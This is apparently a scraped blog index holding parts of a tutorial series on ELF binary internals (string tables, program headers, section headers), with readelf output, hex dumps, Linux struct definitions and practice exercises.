FileSiz MemSiz Flg Align 0 PHDR 0x000040 0x0000000000000040 0x0000000000000040 0x0002d8 0x0002d8 R 0x8 1 INTERP 0x000318 0x0000000000000318 0x0000000000000318 0x00001c 0x00001c R 0x1 [Requesting program interpreter: /lib64/ld-linux-x86-64.so.2] 2 LOAD 0x000000 0x0000000000000000 0x0000000000000000 0x000690 0x000690 R 0x1000 3 LOAD 0x001000 0x0000000000001000 0x0000000000001000 0x00024d 0x00024d R E 0x1000 4 LOAD 0x002000 0x0000000000002000 0x0000000000002000 0x000154 0x000154 R 0x1000 5 LOAD 0x002dd0 0x0000000000003dd0 0x0000000000003dd0 0x00025c 0x000268 RW 0x1000 6 DYNAMIC 0x002de0 0x0000000000003de0 0x0000000000003de0 0x0001e0 0x0001e0 RW 0x8 7 NOTE 0x000338 0x0000000000000338 0x0000000000000338 0x000040 0x000040 R 0x8 8 NOTE 0x000378 0x0000000000000378 0x0000000000000378 0x000044 0x000044 R 0x4 9 GNU_PROPERTY 0x000338 0x0000000000000338 0x0000000000000338 0x000040 0x000040 R 0x8 10 GNU_EH_FRAME 0x002088 0x0000000000002088 0x0000000000002088 0x00002c 0x00002c R 0x4 11 GNU_STACK 0x000000 0x0000000000000000 0x0000000000000000 0x000000 0x000000 RW 0x10 12 GNU_RELRO 0x002dd0 0x0000000000003dd0 0x0000000000003dd0 0x000230 0x000230 R 0x1 Section to Segment mapping: Segment Sections... 00 01 .interp 02 .interp .note.gnu.property .note.gnu.build-id .note.ABI-tag .gnu.hash .dynsym .dynstr .gnu.version .gnu.version_r .rela.dyn .rela.plt 03 .init .plt .text .fini 04 .rodata .eh_frame_hdr .eh_frame 05 .init_array .fini_array .dynamic .got .got.plt .data .bss 06 .dynamic 07 .note.gnu.property 08 .note.gnu.build-id .note.ABI-tag 09 .note.gnu.property 10 .eh_frame_hdr 11 12 .init_array .fini_array .dynamic .got But the section structure is still same as any other string table, so my cool parser parsed it.\n[ 07 ] Section Name: .dynstr Type: 0x3 Flags: 0x2 Addr: 0x4a0 Offset: 0x4a0 Size: 170 Link: 0 Info: 0x0 Addralign: 0x1 Entsize: 0 [ 0 ] [ 1 ] __cxa_finalize [ 16 ] __libc_start_main [ 34 ] __stack_chk_fail [ 51 ] printf [ 58 ] libc.so.6 [ 68 ] GLIBC_2.2.5 [ 80 ] GLIBC_2.4 [ 90 ] GLIBC_2.34 [ 101 ] _ITM_deregisterTMCloneTable [ 129 ] __gmon_start__ [ 144 ] _ITM_registerTMCloneTable Conclusion string tables in ELF files serve as repositories for various strings for section names, symbol names, and other dynamic linking data. The separation of string data into dedicated sections like \u0026ldquo;strtab\u0026rdquo; and \u0026ldquo;dynstr\u0026rdquo; allows for flexibility in string length and ensures that these essential strings are readily available during program execution.\nBefore closing this, I want you to run strip command against the ELF binary used in this article\u0026hellip; Whatever happens will raise some good new questions for you to dig deeper (Some of those questions will be answered as we go forward with this series)\n","permalink":"https://ayedaemon.github.io/post/2023/10/elf-chronicles-string-tables/","summary":"In the article about section headers, you got an introduction to string tables. In this article, we will delve deeper into the topic.\n\u0026hellip;prologue We\u0026rsquo;ll start with the same program we used in the previous article about section headers.\n/* file: hello_world.c */ #include \u0026lt;stdio.h\u0026gt; // A macro #define HELLO_MSG1 \u0026#34;Hello World1\u0026#34; // A global variable char HELLO_MSG2[] = \u0026#34;Hello World2\u0026#34;; // main function int main() { // local variable for main char HELLO_MSG3[] = \u0026#34;Hello World3\u0026#34;; // Print messages printf(\u0026#34;%s\\n\u0026#34;, HELLO_MSG1); printf(\u0026#34;%s\\n\u0026#34;, HELLO_MSG2); printf(\u0026#34;%s\\n\u0026#34;, HELLO_MSG3); return 0; } Compile this and then analyze the ELF executable file using readelf (Not everytime we\u0026rsquo;ll go with xxd).","title":"Elf Chronicles: String Tables (4/?)"},{"content":"In preceding articles, we\u0026rsquo;ve delved into the details of ELF file headers and section headers. Section headers provide insight into how data and instructions are organized based on their characteristics and grouped into distinct sections. These sections remain distinct due to variations in their types and permissions (\u0026hellip; and few other things).\nUp to this point, our focus has been on the aspects of the ELF file as it resides on-disk. However, we now turn our attention to what occurs when the file is loaded into memory. How is its arrangement handled? Are all the sections loaded into memory?\nThis is where the concept of program headers comes into play. Program headers are similar to section headers, but instead of section information, they store segment information. A segment encompasses one or more sections from the ELF file. While program headers hold little significance while the file is on disk, they become imperative when the file needs to be loaded and executed in memory, specifically in the case of executables and shared objects.\nSome criteria for grouping sections to form segments can be:\nType and purpose of the sections (like .data and .bss), Memory Access Permissions and mapping, Alignment and Layout, Segment size constraints, OS and platform requirements, etc For this article, I\u0026rsquo;ll be using the same C code to generate an ELF file\n/* File: hello_world.c Compile: gcc hello_world.c -o hello_world */ #include \u0026lt;stdio.h\u0026gt; // A macro #define HELLO_MSG1 \u0026#34;Hello World1\u0026#34; // A global variable char HELLO_MSG2[] = \u0026#34;Hello World2\u0026#34;; // main function int main() { // local variable for main char HELLO_MSG3[] = \u0026#34;Hello World3\u0026#34;; // Print messages printf(\u0026#34;%s\\n\u0026#34;, HELLO_MSG1); printf(\u0026#34;%s\\n\u0026#34;, HELLO_MSG2); printf(\u0026#34;%s\\n\u0026#34;, HELLO_MSG3); return 0; } Once you have the ELF file, you can get the program header related information from ELF file headers - e_phoff, e_phentsize and e_phnum\nI\u0026rsquo;ll use readelf to get this information from the ELF headers. Feel free to use any method of your choice.\nELF Header: Magic: 7f 45 4c 46 02 01 01 00 00 00 00 00 00 00 00 00 Class: ELF64 Data: 2\u0026#39;s complement, little endian Version: 1 (current) OS/ABI: UNIX - System V ABI Version: 0 Type: DYN (Position-Independent Executable file) Machine: Advanced Micro Devices X86-64 Version: 0x1 Entry point address: 0x1040 Start of program headers: 64 (bytes into file) Start of section headers: 13496 (bytes into file) Flags: 0x0 Size of this header: 64 (bytes) Size of program headers: 56 (bytes) Number of program headers: 13 Size of section headers: 64 (bytes) Number of section headers: 30 Section header string table index: 29 From the the output above, we can deduce that\nthe program headers are located at offset of 64 bytes, each of these header entries is 56 bytes in size, and in total, we\u0026rsquo;ve got 13 entries Now we can use xxd to get the data out\n❯ xxd -s 64 -l $(( 54*13 )) -c 54 build/hello 00000040: 0600 0000 0400 0000 4000 0000 0000 0000 4000 0000 0000 0000 4000 0000 0000 0000 d802 0000 0000 0000 d802 0000 0000 0000 0800 0000 0000 ........@.......@.......@............................. 00000076: 0000 0300 0000 0400 0000 1803 0000 0000 0000 1803 0000 0000 0000 1803 0000 0000 0000 1c00 0000 0000 0000 1c00 0000 0000 0000 0100 0000 ...................................................... 000000ac: 0000 0000 0100 0000 0400 0000 0000 0000 0000 0000 0000 0000 0000 0000 0000 0000 0000 0000 3006 0000 0000 0000 3006 0000 0000 0000 0010 ....................................0.......0......... 000000e2: 0000 0000 0000 0100 0000 0500 0000 0010 0000 0000 0000 0010 0000 0000 0000 0010 0000 0000 0000 8901 0000 0000 0000 8901 0000 0000 0000 ...................................................... 00000118: 0010 0000 0000 0000 0100 0000 0400 0000 0020 0000 0000 0000 0020 0000 0000 0000 0020 0000 0000 0000 b400 0000 0000 0000 b400 0000 0000 ................. ....... ....... .................... 0000014e: 0000 0010 0000 0000 0000 0100 0000 0600 0000 d02d 0000 0000 0000 d03d 0000 0000 0000 d03d 0000 0000 0000 4802 0000 0000 0000 5002 0000 ...................-.......=.......=......H.......P... 00000184: 0000 0000 0010 0000 0000 0000 0200 0000 0600 0000 e02d 0000 0000 0000 e03d 0000 0000 0000 e03d 0000 0000 0000 e001 0000 0000 0000 e001 .....................-.......=.......=................ 000001ba: 0000 0000 0000 0800 0000 0000 0000 0400 0000 0400 0000 3803 0000 0000 0000 3803 0000 0000 0000 3803 0000 0000 0000 4000 0000 0000 0000 ......................8.......8.......8.......@....... 000001f0: 4000 0000 0000 0000 0800 0000 0000 0000 0400 0000 0400 0000 7803 0000 0000 0000 7803 0000 0000 0000 7803 0000 0000 0000 4400 0000 0000 @.......................x.......x.......x.......D..... 00000226: 0000 4400 0000 0000 0000 0400 0000 0000 0000 53e5 7464 0400 0000 3803 0000 0000 0000 3803 0000 0000 0000 3803 0000 0000 0000 4000 0000 ..D...............S.td....8.......8.......8.......@... 0000025c: 0000 0000 4000 0000 0000 0000 0800 0000 0000 0000 50e5 7464 0400 0000 1420 0000 0000 0000 1420 0000 0000 0000 1420 0000 0000 0000 2400 ....@...............P.td..... ....... ....... ......$. 00000292: 0000 0000 0000 2400 0000 0000 0000 0400 0000 0000 0000 51e5 7464 0600 0000 0000 0000 0000 0000 0000 0000 0000 0000 0000 0000 0000 0000 ......$...............Q.td............................ 000002c8: 0000 0000 0000 0000 0000 0000 0000 0000 1000 0000 0000 0000 52e5 7464 0400 0000 d02d 0000 0000 0000 d03d 0000 0000 0000 d03d 0000 0000 ........................R.td.....-.......=.......=.... Now we just have to map each of these lines to Elf64_Phdr (since we have a 64Bit file)\n/* https://elixir.bootlin.com/linux/latest/source/include/uapi/linux/elf.h#L260 */ typedef struct elf64_phdr { Elf64_Word p_type; /* Segment type */ Elf64_Word p_flags; /* Segment flags */ Elf64_Off p_offset; /* Segment file offset */ Elf64_Addr p_vaddr; /* Segment virtual address */ Elf64_Addr p_paddr; /* Segment physical address */ Elf64_Xword p_filesz; /* Segment size in file */ Elf64_Xword p_memsz; /* Segment size in memory */ Elf64_Xword p_align; /* Segment alignment, file \u0026amp; memory */ } Elf64_Phdr; Using my nifty little parser, I got this digestible and user-friendly output for the above dump (Feel free to compare it)\n[ + ] Program headers begins at: 0x40 [ 00 ] Type: 0x6 Flags: 0x4 Offset: 0x0040 vaddr: 0x40 paddr: 0x40 filesz: 0x728 memsz: 0x728 align: 0x8 [ 01 ] Type: 0x3 Flags: 0x4 Offset: 0x0318 vaddr: 0x318 paddr: 0x318 filesz: 0x28 memsz: 0x28 align: 0x1 [ 02 ] Type: 0x1 Flags: 0x4 Offset: 0x0000 vaddr: 0x0 paddr: 0x0 filesz: 0x1584 memsz: 0x1584 align: 0x1000 [ 03 ] Type: 0x1 Flags: 0x5 Offset: 0x1000 vaddr: 0x1000 paddr: 0x1000 filesz: 0x393 memsz: 0x393 align: 0x1000 [ 04 ] Type: 0x1 Flags: 0x4 Offset: 0x2000 vaddr: 0x2000 paddr: 0x2000 filesz: 0x180 memsz: 0x180 align: 0x1000 [ 05 ] Type: 0x1 Flags: 0x6 Offset: 0x2dd0 vaddr: 0x3dd0 paddr: 0x3dd0 filesz: 0x584 memsz: 0x592 align: 0x1000 [ 06 ] Type: 0x2 Flags: 0x6 Offset: 0x2de0 vaddr: 0x3de0 paddr: 0x3de0 filesz: 0x480 memsz: 0x480 align: 0x8 [ 07 ] Type: 0x4 Flags: 0x4 Offset: 0x0338 vaddr: 0x338 paddr: 0x338 filesz: 0x64 memsz: 0x64 align: 0x8 [ 08 ] Type: 0x4 Flags: 0x4 Offset: 0x0378 vaddr: 0x378 paddr: 0x378 filesz: 0x68 memsz: 0x68 align: 0x4 [ 09 ] Type: 0xe553 Flags: 0x4 Offset: 0x0338 vaddr: 0x338 paddr: 0x338 filesz: 0x64 memsz: 0x64 align: 0x8 [ 10 ] Type: 0xe550 Flags: 0x4 Offset: 0x2014 vaddr: 0x2014 paddr: 0x2014 filesz: 0x36 memsz: 0x36 align: 0x4 [ 11 ] Type: 0xe551 Flags: 0x6 Offset: 0x0000 vaddr: 0x0 paddr: 0x0 filesz: 0x0 memsz: 0x0 align: 0x10 [ 12 ] Type: 0xe552 Flags: 0x4 Offset: 0x2dd0 vaddr: 0x3dd0 paddr: 0x3dd0 filesz: 0x560 memsz: 0x560 align: 0x1 Now, it\u0026rsquo;s time to take a deep dive into the inner workings of the Elf64_Phdr struct\n1. p_type Just like sh_type, this member tells the type of the segment. Whether the segment will be loaded in the memory or is it just used to store notes.\n/* https://elixir.bootlin.com/linux/latest/source/include/uapi/linux/elf.h#L25 */ /* These constants are for the segment types stored in the image headers */ #define PT_NULL 0 #define PT_LOAD 1 #define PT_DYNAMIC 2 #define PT_INTERP 3 #define PT_NOTE 4 #define PT_SHLIB 5 #define PT_PHDR 6 #define PT_TLS 7 /* Thread local storage segment */ #define PT_LOOS 0x60000000 /* OS-specific */ #define PT_HIOS 0x6fffffff /* OS-specific */ #define PT_LOPROC 0x70000000 #define PT_HIPROC 0x7fffffff #define PT_GNU_EH_FRAME\t(PT_LOOS + 0x474e550) #define PT_GNU_STACK\t(PT_LOOS + 0x474e551) #define PT_GNU_RELRO\t(PT_LOOS + 0x474e552) #define PT_GNU_PROPERTY\t(PT_LOOS + 0x474e553) 2. p_flags This is quite similar to the the (r)ead, (w)rite and e(x)ecute permissions we are familiar with. This member specifies the permissions for the given segment.\nUsually the segment containing the .text section will have (r)ead and e(x)ecute permissions.\n/* https://elixir.bootlin.com/linux/latest/source/include/uapi/linux/elf.h#L243 */ /* These constants define the permissions on sections in the program header, p_flags. */ #define PF_R 0x4 #define PF_W 0x2 #define PF_X 0x1 3. p_offset This holds the offset from the beginning of the file, where the first byte of the first section in this segment is located.\n4. p_vaddr This member holds the memory/virtual address for the segment.\n5. p_paddr This is same as p_vaddr, but holds the physical/on-disk address for the segment.\n6. p_filesz This holds the on-disk size (in bytes) of the segment.\n7. p_memsz This member holds the memory/virtual size (in bytes) of the segment.\n8. p_align This member holds the value to which the segments are aligned in memory and in the file.\nSimilar to sh_addralign, value of 0 and 1 are treated as \u0026ldquo;no alignment\u0026rdquo;, while the positive powers of 2 are taken as the actual alignment values.\nPracticals Let\u0026rsquo;s start with checking if strip command makes any change to the program headers.\nTry to write a program to parse the program headers and display the information in better way. Try to write a program that gives the information about what sections are grouped together in a segment. readelf gives this information in below format Program Headers: Type Offset VirtAddr PhysAddr FileSiz MemSiz Flg Align PHDR 0x000040 0x0000000000000040 0x0000000000000040 0x0002d8 0x0002d8 R 0x8 INTERP 0x000318 0x0000000000000318 0x0000000000000318 0x00001c 0x00001c R 0x1 [Requesting program interpreter: /lib64/ld-linux-x86-64.so.2 ] LOAD 0x000000 0x0000000000000000 0x0000000000000000 0x000630 0x000630 R 0x1000 LOAD 0x001000 0x0000000000001000 0x0000000000001000 0x000189 0x000189 R E 0x1000 LOAD 0x002000 0x0000000000002000 0x0000000000002000 0x0000b4 0x0000b4 R 0x1000 LOAD 0x002dd0 0x0000000000003dd0 0x0000000000003dd0 0x000248 0x000250 RW 0x1000 DYNAMIC 0x002de0 0x0000000000003de0 0x0000000000003de0 0x0001e0 0x0001e0 RW 0x8 NOTE 0x000338 0x0000000000000338 0x0000000000000338 0x000040 0x000040 R 0x8 NOTE 0x000378 0x0000000000000378 0x0000000000000378 0x000044 0x000044 R 0x4 GNU_PROPERTY 0x000338 0x0000000000000338 0x0000000000000338 0x000040 0x000040 R 0x8 GNU_EH_FRAME 0x002014 0x0000000000002014 0x0000000000002014 0x000024 0x000024 R 0x4 GNU_STACK 0x000000 0x0000000000000000 0x0000000000000000 0x000000 0x000000 RW 0x10 GNU_RELRO 0x002dd0 0x0000000000003dd0 0x0000000000003dd0 0x000230 0x000230 R 0x1 Section to Segment mapping: Segment Sections... 00 01 .interp 02 .interp .note.gnu.property .note.gnu.build-id .note.ABI-tag .gnu.hash .dynsym .dynstr .gnu.version .gnu.version_r .rela.dyn .rela.plt 03 .init .plt .text .fini 04 .rodata .eh_frame_hdr .eh_frame 05 .init_array .fini_array .dynamic .got .got.plt .data .bss 06 .dynamic 07 .note.gnu.property 08 .note.gnu.build-id .note.ABI-tag 09 .note.gnu.property 10 .eh_frame_hdr 11 12 .init_array .fini_array .dynamic .got If you want to go extra mile and dig deep,\nTry overwriting the program interpreter with your custom loader program. Things will probably go wrong and then you can dig deep what\u0026rsquo;s the root cause. Add a new section (.text type), create it\u0026rsquo;s section header entry, then create it\u0026rsquo;s program header entry such that it is loadable in memory. Then change the ELF entrypoint to the newly created section. Conclusion Alright, buckle up, because we have just seen what segments are, how sections are grouped into segments, and how program headers act as a table to store information about segments which is helpful for runtime. Picture this -\n┌───────────────────────────┐ │ │ │ File Header │ │ │ │ │ ├───────────────────────────┤ │ │ │ Program Header │ │ │ │ │ ├───────────────────────────┤ ◄───┐ │ │ │ │ │ │ │ Section 1 │ │ │ │ │ ├───────────────────────────┤ │ Segment 1 │ Section 2 │ │ ├───────────────────────────┤ │ │ │ │ │ Section 3 │ │ ├───────────────────────────┤ ◄───┤ │ │ │ │ │ │ │ │ │ │ │ │ Segment 2 │ │ │ │ Section 4 │ │ │ │ │ │ │ ◄───┤ │ │ │ Segment 3 │ │ │ ├───────────────────────────┤ ◄───┤ │ │ │ │ │ │ │ Section 5 │ │ │ │ │ Segment 4 │ │ │ │ │ │ ├───────────────────────────┤ ◄───┤ │ │ │ │ │ │ │ Section 6 │ │ Segment 5 │ │ │ │ │ │ ├───────────────────────────┤ ◄───┘ │ │ │ │ │ Section Header │ │ │ │ │ └───────────────────────────┘ ","permalink":"https://ayedaemon.github.io/post/2023/10/elf-chronicles-program-headers/","summary":"In preceding articles, we\u0026rsquo;ve delved into the details of ELF file headers and section headers. Section headers provide insight into how data and instructions are organized based on their characteristics and grouped into distinct sections. These sections remain distinct due to variations in their types and permissions (\u0026hellip; and few other things).\nUp to this point, our focus has been on the aspects of the ELF file as it resides on-disk.","title":"ELF Chronicles: Program Headers (3/?)"},{"content":"Intro Assuming you\u0026rsquo;ve got ELF headers like Elf64_Ehdr or Elf32_Ehdr at your fingertips, and you\u0026rsquo;re armed with the know-how and tools to decipher their contents effortlessly.\nFor this article I\u0026rsquo;ll be using the below C code to generate the ELF file.\n/* file: hello_world.c */ #include \u0026lt;stdio.h\u0026gt; // A macro #define HELLO_MSG1 \u0026#34;Hello World1\u0026#34; // A global variable char HELLO_MSG2[] = \u0026#34;Hello World2\u0026#34;; // main function int main() { // local variable for main char HELLO_MSG3[] = \u0026#34;Hello World3\u0026#34;; // Print messages printf(\u0026#34;%s\\n\u0026#34;, HELLO_MSG1); printf(\u0026#34;%s\\n\u0026#34;, HELLO_MSG2); printf(\u0026#34;%s\\n\u0026#34;, HELLO_MSG3); return 0; } You can get the ELF binary by compiling this code.\ngcc hello_world.c -o hello_world Now the task at hand is to read/parse the file and get information regarding the sections (e_shoff, e_shentsize, e_shnum, and e_shstrndx). Mostly I, another mere human, rely on a \u0026ldquo;industry grade\u0026rdquo; tool called readelf to read an ELF file and figure out stuff.\nNow, the challenge on our hands is to crack open the file and unearth some juicy details about the sections. You already know, things like e_shoff, e_shentsize, e_shnum, and e_shstrndx. I confess, like any other mere human, I often lean on a trusty \u0026ldquo;industry-grade\u0026rdquo; tool called readelf to do the heavy lifting when it comes to ELF file forensics. (But it\u0026rsquo;s always good to know the manual methods for those 1% kind of situations)\n❯ readelf --file-header --wide hello_world ELF Header: Magic: 7f 45 4c 46 02 01 01 00 00 00 00 00 00 00 00 00 Class: ELF64 Data: 2\u0026#39;s complement, little endian Version: 1 (current) OS/ABI: UNIX - System V ABI Version: 0 Type: DYN (Position-Independent Executable file) Machine: Advanced Micro Devices X86-64 Version: 0x1 Entry point address: 0x1050 Start of program headers: 64 (bytes into file) Start of section headers: 13608 (bytes into file) Flags: 0x0 Size of this header: 64 (bytes) Size of program headers: 56 (bytes) Number of program headers: 13 Size of section headers: 64 (bytes) Number of section headers: 30 Section header string table index: 29 Examining the output above, we can deduce a few key details.\nFirstly, the section headers take their grand entrance at a distance of 13608 bytes (0x3528 in the mystical language of hex). Each of these header entries is precisely 64 bytes in size (0x40 in hex), and in total, we\u0026rsquo;ve got a flourishing population of 30 sections (1e in hex). So, it\u0026rsquo;s like having a treasure map telling us exactly where to dig in the ELF file and how big the treasure chests are!\n❯ xxd -s 13608 -l $(( 64*30 )) -c 64 hello_world 00003528: 0000 0000 0000 0000 0000 0000 0000 0000 0000 0000 0000 0000 0000 0000 0000 0000 0000 0000 0000 0000 0000 0000 0000 0000 0000 0000 0000 0000 0000 0000 0000 0000 ................................................................ 00003568: 1b00 0000 0100 0000 0200 0000 0000 0000 1803 0000 0000 0000 1803 0000 0000 0000 1c00 0000 0000 0000 0000 0000 0000 0000 0100 0000 0000 0000 0000 0000 0000 0000 ................................................................ 000035a8: 2300 0000 0700 0000 0200 0000 0000 0000 3803 0000 0000 0000 3803 0000 0000 0000 4000 0000 0000 0000 0000 0000 0000 0000 0800 0000 0000 0000 0000 0000 0000 0000 #...............8.......8.......@............................... 000035e8: 3600 0000 0700 0000 0200 0000 0000 0000 7803 0000 0000 0000 7803 0000 0000 0000 2400 0000 0000 0000 0000 0000 0000 0000 0400 0000 0000 0000 0000 0000 0000 0000 6...............x.......x.......$............................... 00003628: 4900 0000 0700 0000 0200 0000 0000 0000 9c03 0000 0000 0000 9c03 0000 0000 0000 2000 0000 0000 0000 0000 0000 0000 0000 0400 0000 0000 0000 0000 0000 0000 0000 I............................... ............................... 00003668: 5700 0000 f6ff ff6f 0200 0000 0000 0000 c003 0000 0000 0000 c003 0000 0000 0000 1c00 0000 0000 0000 0600 0000 0000 0000 0800 0000 0000 0000 0000 0000 0000 0000 W......o........................................................ 000036a8: 6100 0000 0b00 0000 0200 0000 0000 0000 e003 0000 0000 0000 e003 0000 0000 0000 c000 0000 0000 0000 0700 0000 0100 0000 0800 0000 0000 0000 1800 0000 0000 0000 a............................................................... 000036e8: 6900 0000 0300 0000 0200 0000 0000 0000 a004 0000 0000 0000 a004 0000 0000 0000 a800 0000 0000 0000 0000 0000 0000 0000 0100 0000 0000 0000 0000 0000 0000 0000 i............................................................... 00003728: 7100 0000 ffff ff6f 0200 0000 0000 0000 4805 0000 0000 0000 4805 0000 0000 0000 1000 0000 0000 0000 0600 0000 0000 0000 0200 0000 0000 0000 0200 0000 0000 0000 q......o........H.......H....................................... 00003768: 7e00 0000 feff ff6f 0200 0000 0000 0000 5805 0000 0000 0000 5805 0000 0000 0000 4000 0000 0000 0000 0700 0000 0100 0000 0800 0000 0000 0000 0000 0000 0000 0000 ~......o........X.......X.......@............................... 000037a8: 8d00 0000 0400 0000 0200 0000 0000 0000 9805 0000 0000 0000 9805 0000 0000 0000 c000 0000 0000 0000 0600 0000 0000 0000 0800 0000 0000 0000 1800 0000 0000 0000 ................................................................ 000037e8: 9700 0000 0400 0000 4200 0000 0000 0000 5806 0000 0000 0000 5806 0000 0000 0000 3000 0000 0000 0000 0600 0000 1700 0000 0800 0000 0000 0000 1800 0000 0000 0000 ........B.......X.......X.......0............................... 00003828: a100 0000 0100 0000 0600 0000 0000 0000 0010 0000 0000 0000 0010 0000 0000 0000 1b00 0000 0000 0000 0000 0000 0000 0000 0400 0000 0000 0000 0000 0000 0000 0000 ................................................................ 00003868: 9c00 0000 0100 0000 0600 0000 0000 0000 2010 0000 0000 0000 2010 0000 0000 0000 3000 0000 0000 0000 0000 0000 0000 0000 1000 0000 0000 0000 1000 0000 0000 0000 ................ ....... .......0............................... 000038a8: a700 0000 0100 0000 0600 0000 0000 0000 5010 0000 0000 0000 5010 0000 0000 0000 7101 0000 0000 0000 0000 0000 0000 0000 1000 0000 0000 0000 0000 0000 0000 0000 ................P.......P.......q............................... 000038e8: ad00 0000 0100 0000 0600 0000 0000 0000 c411 0000 0000 0000 c411 0000 0000 0000 0d00 0000 0000 0000 0000 0000 0000 0000 0400 0000 0000 0000 0000 0000 0000 0000 ................................................................ 00003928: b300 0000 0100 0000 0200 0000 0000 0000 0020 0000 0000 0000 0020 0000 0000 0000 1100 0000 0000 0000 0000 0000 0000 0000 0400 0000 0000 0000 0000 0000 0000 0000 ................. ....... ...................................... 00003968: bb00 0000 0100 0000 0200 0000 0000 0000 1420 0000 0000 0000 1420 0000 0000 0000 2400 0000 0000 0000 0000 0000 0000 0000 0400 0000 0000 0000 0000 0000 0000 0000 ................. ....... ......$............................... 000039a8: c900 0000 0100 0000 0200 0000 0000 0000 3820 0000 0000 0000 3820 0000 0000 0000 7c00 0000 0000 0000 0000 0000 0000 0000 0800 0000 0000 0000 0000 0000 0000 0000 ................8 ......8 ......|............................... 000039e8: d300 0000 0e00 0000 0300 0000 0000 0000 d03d 0000 0000 0000 d02d 0000 0000 0000 0800 0000 0000 0000 0000 0000 0000 0000 0800 0000 0000 0000 0800 0000 0000 0000 .................=.......-...................................... 00003a28: df00 0000 0f00 0000 0300 0000 0000 0000 d83d 0000 0000 0000 d82d 0000 0000 0000 0800 0000 0000 0000 0000 0000 0000 0000 0800 0000 0000 0000 0800 0000 0000 0000 .................=.......-...................................... 00003a68: eb00 0000 0600 0000 0300 0000 0000 0000 e03d 0000 0000 0000 e02d 0000 0000 0000 e001 0000 0000 0000 0700 0000 0000 0000 0800 0000 0000 0000 1000 0000 0000 0000 .................=.......-...................................... 00003aa8: f400 0000 0100 0000 0300 0000 0000 0000 c03f 0000 0000 0000 c02f 0000 0000 0000 2800 0000 0000 0000 0000 0000 0000 0000 0800 0000 0000 0000 0800 0000 0000 0000 .................?......./......(............................... 00003ae8: f900 0000 0100 0000 0300 0000 0000 0000 e83f 0000 0000 0000 e82f 0000 0000 0000 2800 0000 0000 0000 0000 0000 0000 0000 0800 0000 0000 0000 0800 0000 0000 0000 .................?......./......(............................... 00003b28: 0201 0000 0100 0000 0300 0000 0000 0000 1040 0000 0000 0000 1030 0000 0000 0000 1d00 0000 0000 0000 0000 0000 0000 0000 0800 0000 0000 0000 0000 0000 0000 0000 .................@.......0...................................... 00003b68: 0801 0000 0800 0000 0300 0000 0000 0000 2d40 0000 0000 0000 2d30 0000 0000 0000 0300 0000 0000 0000 0000 0000 0000 0000 0100 0000 0000 0000 0000 0000 0000 0000 ................-@......-0...................................... 00003ba8: 0d01 0000 0100 0000 3000 0000 0000 0000 0000 0000 0000 0000 2d30 0000 0000 0000 1b00 0000 0000 0000 0000 0000 0000 0000 0100 0000 0000 0000 0100 0000 0000 0000 ........0...............-0...................................... 00003be8: 0100 0000 0200 0000 0000 0000 0000 0000 0000 0000 0000 0000 4830 0000 0000 0000 7002 0000 0000 0000 1c00 0000 0600 0000 0800 0000 0000 0000 1800 0000 0000 0000 ........................H0......p............................... 00003c28: 0900 0000 0300 0000 0000 0000 0000 0000 0000 0000 0000 0000 b832 0000 0000 0000 5301 0000 0000 0000 0000 0000 0000 0000 0100 0000 0000 0000 0000 0000 0000 0000 .........................2......S............................... 00003c68: 1100 0000 0300 0000 0000 0000 0000 0000 0000 0000 0000 0000 0b34 0000 0000 0000 1601 0000 0000 0000 0000 0000 0000 0000 0100 0000 0000 0000 0000 0000 0000 0000 .........................4...................................... With each line presenting itself as a section header entry, it\u0026rsquo;s like experiencing an elegant and straightforward design! Now we just have to map each of these lines to Elf64_Shdr (since we have a 64Bit file)\n/* https://elixir.bootlin.com/linux/latest/source/include/uapi/linux/elf.h#L321 */ typedef struct elf64_shdr { Elf64_Word sh_name;\t/* Section name, index in string tbl # 4 bytes */ Elf64_Word sh_type;\t/* Type of section # 4 bytes */ Elf64_Xword sh_flags;\t/* Miscellaneous section attributes # 8 bytes */ Elf64_Addr sh_addr;\t/* Section virtual addr at execution # 8 bytes */ Elf64_Off sh_offset;\t/* Section file offset # 8 bytes */ Elf64_Xword sh_size;\t/* Size of section in bytes # 8 bytes */ Elf64_Word sh_link;\t/* Index of another section # 4 bytes */ Elf64_Word sh_info;\t/* Additional section information # 4 bytes */ Elf64_Xword sh_addralign;\t/* Section alignment # 8 bytes */ Elf64_Xword sh_entsize;\t/* Entry size if section holds table # 8 bytes */ } Elf64_Shdr; But first, understand why we are doing any of this\u0026hellip;\nSection headers Imagine a LEGO batmobile – it\u0026rsquo;s not just one big block, right? It has different parts, like a roof, doors, wheels, etc. ELF sections (not section headers) are like these parts in a computer program. Each section has its own job, some sections hold the variables, some hold the program instructions, while some just hold extra notes. Basically, each section has some data in it and has a specific role for that data.\nSection headers is like a index for those sections. It tells you a good amount of details about the section, like\nName of the section (indirectly :P), Type of section, Offset of the address in file and memory, Size of the section in bytes, etc Now you know what section headers are and the valuable data they contain, and with the ELF file headers acting as our treasure map, directing us to the precise location of the section headers in the file (e_shoff), detailing their entry size (e_shentsize) and counting their entries (e_shnum).\nI\u0026rsquo;ve also whipped up a nifty little parser, just for the occasion. It\u0026rsquo;s designed to gracefully dissect an ELF file and lay out the section headers in a more digestible and user-friendly fashion. No more cryptic hexdumps or xxd outputs for us!\n[ + ] Section headers begins at: 0x34b8 [ 00 ] Section Name: Type: 0x0 Flags: 0x0 Addr: 0x0 Offset: 0x0 Size: 0 Link: 0 Info: 0x0 Addralign: 0x0 Entsize: 0 [ 01 ] Section Name: .interp Type: 0x1 Flags: 0x2 Addr: 0x318 Offset: 0x318 Size: 28 Link: 0 Info: 0x0 Addralign: 0x1 Entsize: 0 [ 02 ] Section Name: .note.gnu.property Type: 0x7 Flags: 0x2 Addr: 0x338 Offset: 0x338 Size: 64 Link: 0 Info: 0x0 Addralign: 0x8 Entsize: 0 [ 03 ] Section Name: .note.gnu.build-id Type: 0x7 Flags: 0x2 Addr: 0x378 Offset: 0x378 Size: 36 Link: 0 Info: 0x0 Addralign: 0x4 Entsize: 0 [ 04 ] Section Name: .note.ABI-tag Type: 0x7 Flags: 0x2 Addr: 0x39c Offset: 0x39c Size: 32 Link: 0 Info: 0x0 Addralign: 0x4 Entsize: 0 [ 05 ] Section Name: .gnu.hash Type: 0xfff6 Flags: 0x2 Addr: 0x3c0 Offset: 0x3c0 Size: 28 Link: 6 Info: 0x0 Addralign: 0x8 Entsize: 0 [ 06 ] Section Name: .dynsym Type: 0xb Flags: 0x2 Addr: 0x3e0 Offset: 0x3e0 Size: 168 Link: 7 Info: 0x1 Addralign: 0x8 Entsize: 24 [ 07 ] Section Name: .dynstr Type: 0x3 Flags: 0x2 Addr: 0x488 Offset: 0x488 Size: 144 Link: 0 Info: 0x0 Addralign: 0x1 Entsize: 0 [ 08 ] Section 